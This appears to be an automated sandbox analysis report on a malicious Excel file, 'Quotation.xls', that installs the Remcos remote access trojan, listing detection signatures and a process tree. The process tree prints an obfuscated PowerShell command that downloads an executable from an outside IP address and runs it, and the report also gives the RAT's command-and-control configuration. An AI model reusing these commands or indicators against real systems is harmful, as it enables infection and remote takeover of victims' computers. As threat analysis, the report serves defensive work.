Edit tour
Windows
Analysis Report
Quotation.xls
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 2932 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3296 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3376 cmdline:
"C:\Window s\system32 \cmd.exe" "/c POWERs HElL.exe -ex BypAss -nop -w 1 -c DE ViCEcReDEn TiaLdEPLOY mEnT ; IEx ($(Iex('[S ysTem.tEXt .ENCoDINg] '+[CHar]0x 3A+[ChaR]5 8+'Utf8.GE tStRING([s YSTem.COnv erT]'+[CHA r]0X3A+[CH Ar]0x3A+'f RoMbASe64s trinG('+[C har]34+'JD F6SUdOc3cg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBhZEQtdF lwRSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbUVN YmVyZGVmaU 5JVElvbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgidXJs bW9uIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQ2 hhclNldCA9 IENoYXJTZX QuVW5pY29k ZSldcHVibG ljIHN0YXRp YyBleHRlcm 4gSW50UHRy IFVSTERvd2 5sb2FkVG9G aWxlKEludF B0ciAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICByTVh2 eVRsVnFGLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBv LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BQQ2csdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBrRnZHWH FFdGdOLElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBIeC k7JyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTkFN RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiZGIiIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC 1OQW1lU3Bh Y2UgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgeUFqVF B0cCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC QxeklHTnN3 OjpVUkxEb3 dubG9hZFRv RmlsZSgwLC JodHRwOi8v MTA3LjE3My 4xNDMuNDYv VDI1MDdGL2 NzcnNzLmV4 ZSIsIiRFbn Y6QVBQREFU QVx3aW5pdG kuZXhlIiww LDApO1N0QX JULXNMZUVw KDMpO3NUQV JUICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICIkRW5W OkFQUERBVE Fcd2luaXRp LmV4ZSI='+ [CHAr]34+' ))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3400 cmdline:
POWERsHElL .exe -ex B ypAss -nop -w 1 -c DEViCE cReDEnTiaL dEPLOYmEnT ; IEx($(I ex('[SysTe m.tEXt.ENC oDINg]'+[C Har]0x3A+[ ChaR]58+'U tf8.GEtStR ING([sYSTe m.COnverT] '+[CHAr]0X 3A+[CHAr]0 x3A+'fRoMb ASe64strin G('+[Char] 34+'JDF6SU dOc3cgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBh ZEQtdFlwRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbUVNYmVy ZGVmaU5JVE lvbiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAnW0Rs bEltcG9ydC gidXJsbW9u IiwgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQ2hhcl NldCA9IENo YXJTZXQuVW 5pY29kZSld cHVibGljIH N0YXRpYyBl eHRlcm4gSW 50UHRyIFVS TERvd25sb2 FkVG9GaWxl KEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC ByTVh2eVRs VnFGLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBvLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBQQ2 csdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBr RnZHWHFFdG dOLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBIeCk7Jy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTkFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZGIiICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OQW 1lU3BhY2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg eUFqVFB0cC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICQxek lHTnN3OjpV UkxEb3dubG 9hZFRvRmls ZSgwLCJodH RwOi8vMTA3 LjE3My4xND MuNDYvVDI1 MDdGL2Nzcn NzLmV4ZSIs IiRFbnY6QV BQREFUQVx3 aW5pdGkuZX hlIiwwLDAp O1N0QXJULX NMZUVwKDMp O3NUQVJUIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC IkRW5WOkFQ UERBVEFcd2 luaXRpLmV4 ZSI='+[CHA r]34+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3512 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\ofvwqf jd\ofvwqfj d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3520 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC41B.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\ofv wqfjd\CSC4 2CCF8E8871 B428699CAD 148D9BC26F F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - winiti.exe (PID: 3608 cmdline:
"C:\Users\ user\AppDa ta\Roaming \winiti.ex e" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760) - InstallUtil.exe (PID: 3660 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\ins tallutil.e xe" MD5: AF862061889F5B9B956E9469DCDAE773) - mshta.exe (PID: 3828 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3912 cmdline:
"C:\Window s\system32 \cmd.exe" "/c POWERs HElL.exe -ex BypAss -nop -w 1 -c DE ViCEcReDEn TiaLdEPLOY mEnT ; IEx ($(Iex('[S ysTem.tEXt .ENCoDINg] '+[CHar]0x 3A+[ChaR]5 8+'Utf8.GE tStRING([s YSTem.COnv erT]'+[CHA r]0X3A+[CH Ar]0x3A+'f RoMbASe64s trinG('+[C har]34+'JD F6SUdOc3cg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg PSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBhZEQtdF lwRSAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbUVN YmVyZGVmaU 5JVElvbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAn W0RsbEltcG 9ydCgidXJs bW9uIiwgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQ2 hhclNldCA9 IENoYXJTZX QuVW5pY29k ZSldcHVibG ljIHN0YXRp YyBleHRlcm 4gSW50UHRy IFVSTERvd2 5sb2FkVG9G aWxlKEludF B0ciAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICByTVh2 eVRsVnFGLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBv LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BQQ2csdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBrRnZHWH FFdGdOLElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBIeC k7JyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTkFN RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiZGIiIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC 1OQW1lU3Bh Y2UgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgeUFqVF B0cCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtUGFz c1RocnU7IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC QxeklHTnN3 OjpVUkxEb3 dubG9hZFRv RmlsZSgwLC JodHRwOi8v MTA3LjE3My 4xNDMuNDYv VDI1MDdGL2 NzcnNzLmV4 ZSIsIiRFbn Y6QVBQREFU QVx3aW5pdG kuZXhlIiww LDApO1N0QX JULXNMZUVw KDMpO3NUQV JUICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICIkRW5W OkFQUERBVE Fcd2luaXRp LmV4ZSI='+ [CHAr]34+' ))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3936 cmdline:
POWERsHElL .exe -ex B ypAss -nop -w 1 -c DEViCE cReDEnTiaL dEPLOYmEnT ; IEx($(I ex('[SysTe m.tEXt.ENC oDINg]'+[C Har]0x3A+[ ChaR]58+'U tf8.GEtStR ING([sYSTe m.COnverT] '+[CHAr]0X 3A+[CHAr]0 x3A+'fRoMb ASe64strin G('+[Char] 34+'JDF6SU dOc3cgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgPSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBh ZEQtdFlwRS AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbUVNYmVy ZGVmaU5JVE lvbiAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAnW0Rs bEltcG9ydC gidXJsbW9u IiwgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQ2hhcl NldCA9IENo YXJTZXQuVW 5pY29kZSld cHVibGljIH N0YXRpYyBl eHRlcm4gSW 50UHRyIFVS TERvd25sb2 FkVG9GaWxl KEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC ByTVh2eVRs VnFGLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBvLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBQQ2 csdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBr RnZHWHFFdG dOLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBIeCk7Jy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTkFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZGIiICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OQW 1lU3BhY2Ug ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg eUFqVFB0cC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtUGFzc1Ro cnU7ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICQxek lHTnN3OjpV UkxEb3dubG 9hZFRvRmls ZSgwLCJodH RwOi8vMTA3 LjE3My4xND MuNDYvVDI1 MDdGL2Nzcn NzLmV4ZSIs IiRFbnY6QV BQREFUQVx3 aW5pdGkuZX hlIiwwLDAp O1N0QXJULX NMZUVwKDMp O3NUQVJUIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC IkRW5WOkFQ UERBVEFcd2 luaXRpLmV4 ZSI='+[CHA r]34+'))') ))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 4020 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\ge3s1w mx\ge3s1wm x.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 4032 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC9F.tmp " "c:\User s\user\App Data\Local \Temp\ge3s 1wmx\CSCB3 6078EA6101 4130AC1261 969F8319D. TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - winiti.exe (PID: 4076 cmdline:
"C:\Users\ user\AppDa ta\Roaming \winiti.ex e" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760) - MSBuild.exe (PID: 1808 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\msb uild.exe" MD5: C1BE61F3DE532751D6C1A35B851B0367) - AddInProcess32.exe (PID: 2480 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
Click to see the 18 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
Click to see the 43 entries |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |